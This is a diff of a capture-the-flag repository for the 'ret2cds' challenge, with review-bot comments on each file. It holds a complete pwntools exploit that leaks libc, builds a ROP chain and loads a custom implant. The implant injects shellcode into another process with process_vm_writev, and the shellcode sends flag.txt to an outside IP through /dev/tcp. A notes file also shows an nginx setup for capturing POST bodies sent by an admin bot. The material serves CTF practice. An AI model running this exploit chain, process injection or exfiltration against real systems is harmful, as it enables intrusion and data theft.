COPY ./start.sh /start.sh
RUN chmod 755 /start.sh
USER ret2cds
CMD ["/start.sh"]
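
Review bot: `RUN apt-get update` and `RUN apt-get install -y openjdk-11-jdk` are separate layers, so a cached update layer can be paired with a later install and resolve stale or missing package versions; merge them into one `RUN apt-get update && apt-get install -y --no-install-recommends openjdk-11-jdk && rm -rf /var/lib/apt/lists/*` so the build is reproducible and the image smaller. `ENV DEBIAN_FRONTEND noninteractive` also persists into the running container; setting it inline on the apt line keeps it build-only. The flag is left world-readable (`chmod 754 /home/ret2cds/flag.txt`) under root-owned files, which is fine for a CTF target but deserves a one-line comment so the deliberate readability is not mistaken for an oversight.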


@ -0,0 +1 @@
fakeflag

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -0,0 +1,11 @@
version: '2.4'
services:
ret2cds:
build: .
ports:
- 1337:1337
restart: always
security_opt:
- seccomp=seccomp.json
cap_add:
- sys_ptrace
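
Review bot: `cap_add: - sys_ptrace` is the line that needs a comment. CAP_SYS_PTRACE relaxes the ptrace access checks (including Yama's restriction to descendant processes) so that a process in the container can read and write the memory of other processes in the same PID namespace; stage2.c's process_vm_writev into the Java parent depends on it. Together with `seccomp=seccomp.json`, which replaces Docker's default profile, these two settings define the real boundary of the challenge, so state in the file that the capability is intentional rather than leaving it to look like a leftover from debugging.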

File diff suppressed because it is too large

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -0,0 +1,3 @@
#!/bin/sh
cd /home/ret2cds
while true; do java -jar /opt/nc-java/nc-java.jar ./ret2cds 1337; done
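
Review bot: `while true; do java -jar ... ; done` restarts with no back-off, so if the JVM fails to start (jar missing, port 1337 still bound) the loop spins hot and floods the container log; add a `sleep 1` after the java invocation. `cd /home/ret2cds` is also unchecked, so a failed `cd` would serve `./ret2cds` from `/` instead; `cd /home/ret2cds || exit 1` makes the failure visible.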


@ -0,0 +1,16 @@
.PHONY: all clean copy
CC=gcc
OBJCOPY=objcopy
all: implant.bin
clean:
$(RM) *.bin *.elf
implant.bin: implant.elf
$(OBJCOPY) -O binary $< $@
implant.elf: stage2.c stage2.ld
$(CC) -nostdlib -nodefaultlibs -nostdinc -T stage2.ld -fpic -fno-stack-protector \
-Os -std=gnu11 -Wall -Wextra -o $@ $<
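
Review bot: `.PHONY: all clean copy` declares a `copy` target that has no rule, so `make copy` fails with "No rule to make target"; either add the rule or drop the name. `-fpic` is also at odds with a linker script that pins `ORIGIN = 0x133713370000`: the image is linked for that fixed address and solve.py maps it exactly there, so position independence buys nothing and only routes each global access through a GOT. A comment on the `implant.bin` rule that `objcopy -O binary` emits only allocated, initialised sections would explain why `_start` has to zero `.bss` itself.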


@ -0,0 +1,70 @@
from pwn import *
import os
context.arch = 'amd64'
def run():
elf = ELF("../challenge/chall/ret2cds")
rop = ROP(elf)
rop.write(1, elf.got['write'])
print(rop.dump())
libc = ELF("../challenge/chall/libc.so.6")
print(hex(libc.symbols['write']))
# r = process(["./ld-2.31.so", "./ret2cds"], env={"LD_PRELOAD": os.getcwd() + "/libc.so.6"})
# gdb.attach(r)
# r = remote("localhost", 1337)
r = remote("ret2cds.be.ax", 34485)
try:
r.recvuntil("warden: ")
r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a))
print(r.recvline())
print(r.recvline())
leak = r.recvline()[1:8]
leak = u64(leak.ljust(8, b'\x00'))
print(hex(leak))
libc_base = leak - libc.symbols['write']
print(hex(libc_base))
libc.address = libc_base
libc_rop = ROP(libc)
libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0)
libc_rop.read(0, 0x133713370000, 0x10000)
print(libc_rop.dump())
print(libc_rop.chain())
# abuse setcontext lol
# setcontext is always a good function to look for cool gadgets in
# loaded as 0x0
# 001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30]
# 001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88]
# 88 00 00 00
# 001581ec 31 c0 XOR EAX,EAX
# 001581ee c3 RET
fucky_r9_gadget = p64(0x581e1 + libc_base)
# load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets
pre_rop = ROP(libc)
pre_rop.rdx = 0x402008 - 0x30
r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000))
os.system("make")
with open("implant.bin", "rb") as f:
shellcode = f.read()
shellcode += b"\x00" * (0x10000 - len(shellcode))
r.send(shellcode)
# stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))
r.interactive()
finally:
r.close()
if __name__ == "__main__":
run()
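
Review bot: `rop.write(1, elf.got['write'])` supplies only two arguments, so the byte count is whatever rdx happens to hold when the chain reaches `write`, and the two `recvline()` calls plus the `[1:8]` slice are tuned to that incidental output; passing the length explicitly (`rop.write(1, elf.got['write'], 8)`) and reading exactly 8 bytes makes the leak parse deterministic and removes the case where a 0x0a byte inside the pointer truncates `recvline()`. `r.recvuntil("warden: ")` passes a str where pwntools on Python 3 expects bytes; use `b"warden: "`. The `0x581e1` gadget offset and the `0x0040123a` return address are tied to the shipped libc.so.6 and binary; naming them as constants with a note on where they come from (the listed `001581e1` minus the 0x100000 image base the comment block was taken at) would save the next reader a disassembly.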


@ -0,0 +1,174 @@
// look ma no stdlib
typedef unsigned char uint8_t;
_Static_assert(sizeof(uint8_t) == 1, "uint8_t wrong size");
typedef unsigned short uint16_t;
_Static_assert(sizeof(uint16_t) == 2, "uint16_t wrong size");
typedef unsigned int uint32_t;
_Static_assert(sizeof(uint32_t) == 4, "uint32_t wrong size");
typedef unsigned long long uint64_t;
_Static_assert(sizeof(uint64_t) == 8, "uint64_t wrong size");
typedef unsigned int size_t;
typedef int ssize_t;
#define NULL ((void*)0x0)
#define pid_t unsigned long
#define true 1
#define false 0
#define SYS_exit 1
#define SYS_read 0
#define SYS_write 1
#define SYS_process_vm_readv 310
#define SYS_process_vm_writev 311
struct iovec {
void *iov_base; /* Starting address */
size_t iov_len; /* Number of bytes to transfer */
};
int main();
void __attribute__((noreturn)) exit(int);
void* memset(void* dst, int val, size_t size) {
for (size_t i = 0; i < size; i++) {
((uint8_t*)dst)[i] = val;
}
return dst;
}
void* memcpy(void* dst, const void* src, size_t size) {
for (size_t i = 0; i < size; i++) {
((uint8_t*)dst)[i] = ((uint8_t*)src)[i];
}
return dst;
}
size_t strlen(const char* s) {
size_t sz = 0;
while(*s) {
s++;
sz++;
}
return sz;
}
extern uint8_t _bss;
extern uint8_t _ebss;
void __attribute__((noreturn)) __attribute__((section(".text.start"))) _start() {
// wipe .bss
memset(&_bss, 0, (&_ebss) - (&_bss));
// go to main!
exit(main());
}
ssize_t read(int _fd, void* _buf, size_t _len) {
register int fd asm("rdi") = _fd;
register void* buf asm("rsi") = _buf;
register size_t len asm("rdx") = _len;
register int syscall asm("rax") = SYS_read;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory");
return ret;
}
void write(int _fd, const void* _buf, size_t _len) {
register int fd asm("rdi") = _fd;
register const void* buf asm("rsi") = _buf;
register size_t len asm("rdx") = _len;
register int syscall asm("rax") = SYS_write;
asm volatile("syscall" :: "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory");
}
void __attribute__((noreturn)) exit(int _code) {
register int code asm("rdi") = _code;
register int syscall asm("rax") = SYS_exit;
asm volatile("syscall" :: "r"(code), "r"(syscall) : "memory");
__builtin_unreachable();
}
ssize_t process_vm_readv(pid_t _pid,
const struct iovec *_local_iov,
unsigned long _liovcnt,
const struct iovec *_remote_iov,
unsigned long _riovcnt,
unsigned long _flags) {
register pid_t pid asm("rdi") = _pid;
register struct iovec* local_iov asm("rsi") = _local_iov;
register unsigned long liovcnt asm("rdx") = _liovcnt;
register struct iovec* remote_iov asm("r10") = _remote_iov;
register unsigned long riovcnt asm("r8") = _riovcnt;
register unsigned long flags asm("r9") = _flags;
register int syscall asm("rax") = SYS_process_vm_readv;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov),
"r"(riovcnt), "r"(flags), "r"(syscall) : "memory");
return ret;
}
ssize_t process_vm_writev(pid_t _pid,
const struct iovec *_local_iov,
unsigned long _liovcnt,
const struct iovec *_remote_iov,
unsigned long _riovcnt,
unsigned long _flags) {
register pid_t pid asm("rdi") = _pid;
register struct iovec* local_iov asm("rsi") = _local_iov;
register unsigned long liovcnt asm("rdx") = _liovcnt;
register struct iovec* remote_iov asm("r10") = _remote_iov;
register unsigned long riovcnt asm("r8") = _riovcnt;
register unsigned long flags asm("r9") = _flags;
register int syscall asm("rax") = SYS_process_vm_writev;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov),
"r"(riovcnt), "r"(flags), "r"(syscall) : "memory");
return ret;
}
////////////////////////////////////////////////////////////////////////////////////////////////////
void print(char* s) {
write(1, s, strlen(s));
}
const char* hex_chars = "0123456789abcdef";
void print_int(unsigned long x) {
char c;
for(int i = 0; i < 64; i+= 4) {
c = hex_chars[(x >> (64 - 4 - i)) & 0xf];
write(1, &c, 1);
}
}
// asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))
char* buf = "\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x48\x89\xe7\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x31\x2e\x30\x32\x32\x36\x01\x01\x48\x31\x04\x24\x48\xb8\x34\x34\x2e\x31\x32\x37\x2e\x31\x50\x48\xb8\x2f\x74\x63\x70\x2f\x34\x34\x2e\x50\x48\xb8\x74\x20\x3e\x20\x2f\x64\x65\x76\x50\x48\xb8\x20\x66\x6c\x61\x67\x2e\x74\x78\x50\x48\xb8\x68\x61\x78\x3b\x20\x63\x61\x74\x50\x48\xb8\x63\x68\x20\x2f\x74\x6d\x70\x2f\x50\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x69\x01\x2c\x62\x01\x75\x6e\x74\x48\x31\x04\x24\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x31\xf6\x56\x6a\x15\x5e\x48\x01\xe6\x56\x6a\x1a\x5e\x48\x01\xe6\x56\x6a\x18\x5e\x48\x01\xe6\x56\x48\x89\xe6\x6a\x01\xfe\x0c\x24\x31\xd2\x52\x48\x89\xe2\x6a\x3b\x58\x0f\x05";
char buf2[0x2000];
struct iovec remote_vec = { (void*)0x800000000, 0x2000 };
struct iovec local_vec = { &buf2[0], 0x2000 };
int main() {
print("implant is booted\n");
memset(buf2, 0x90, 0x2000);
memcpy(&buf2[0x2000 - 186], buf, 186);
for (int i = 2; i < 100; i++) {
print("sending to pid:");
print_int(i);
print("\n");
ssize_t ret = process_vm_writev(i, &local_vec, 1, &remote_vec, 1, 0);
if (ret <= 0) {
print("bad ret!: ");
print_int(-ret);
print("\n");
} else {
print("GOOD RET\n");
break;
}
}
print("injection complete\n");
while(true){}
return 120;
}
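
Review bot: `#define SYS_exit 1` is the x86-64 number for write (exit is 60), so the `exit()` that `_start` calls on return from `main` would actually issue a write with garbage rsi/rdx; it is only harmless because `main` never gets past `while(true){}`. Likewise `typedef unsigned int size_t;` and `typedef int ssize_t;` are 32-bit on a 64-bit target, so `struct iovec` only matches the kernel's 16-byte layout because the four bytes of padding after `iov_len` are zero in the statically initialised `remote_vec`/`local_vec`; a stack-allocated iovec would hand the kernel an indeterminate upper half of the length. Fix with `typedef unsigned long size_t; typedef long ssize_t;` and `#define SYS_exit 60`. In the pid scan, `if (ret <= 0)` followed by `print_int(-ret)` is correct for the raw syscall's negative-errno return, but a comment saying so would help since a libc-style wrapper returns -1 and sets errno instead.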


@ -0,0 +1,33 @@
ENTRY(_start)
MEMORY
{
RAM (rwx) : ORIGIN = 0x133713370000, LENGTH = 0x10000
}
SECTIONS
{
.text :
{
*(.text.start)
*(.text*)
}
.rodata :
{
*(.rodata*)
}
.data :
{
*(.data*)
}
.bss :
{
_bss = .;
*(.bss*)
*(COMMON)
_ebss = .;
}
}
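
Review bot: `ORIGIN = 0x133713370000, LENGTH = 0x10000` duplicates the address and size that solve.py passes to `mmap` and `read`; if either side changes, the implant is loaded somewhere other than its link address and, because the script fixes the link address, the absolute pointers in the GOT that `-fpic` produces no longer match. Keep one source of truth, for example by having solve.py take the address from the ELF's entry point. No `.got`/`.got.plt` output section is listed either, so the linker places them as orphan sections; listing them explicitly keeps the binary image layout predictable.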

Binary file not shown.


22
2021/corctf/tricks.md Normal file

@ -0,0 +1,22 @@
# tricks
## phpme: log all submitted post data with nginx
(to capture a flag POSTed by an adminbot)
you can avoid having to write any code and use pure nginx config for this lol
i'm putting this here because i don't wanna write up phpme but this is a cool thing i found out in
the process
```nginx
log_format postdata $request_body;
server {
location /flagzone {
access_log /var/log/nginx/flags.log postdata;
echo_read_request_body;
# ...
}
# ...
}
```
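
Review bot: `echo_read_request_body;` is a directive from the third-party echo module (ngx_http_echo_module, shipped with OpenResty), not stock nginx, so this config only parses on a build that includes it; the text should say so, or the location should read the body some other way (for example a `proxy_pass` to a trivial backend). One caveat worth adding for the capture itself: `$request_body` is only populated when the body was read into memory, so a body larger than `client_body_buffer_size` is spooled to a temp file and logs as empty; raise the buffer size for `/flagzone` or log `$request_body_file` alongside it.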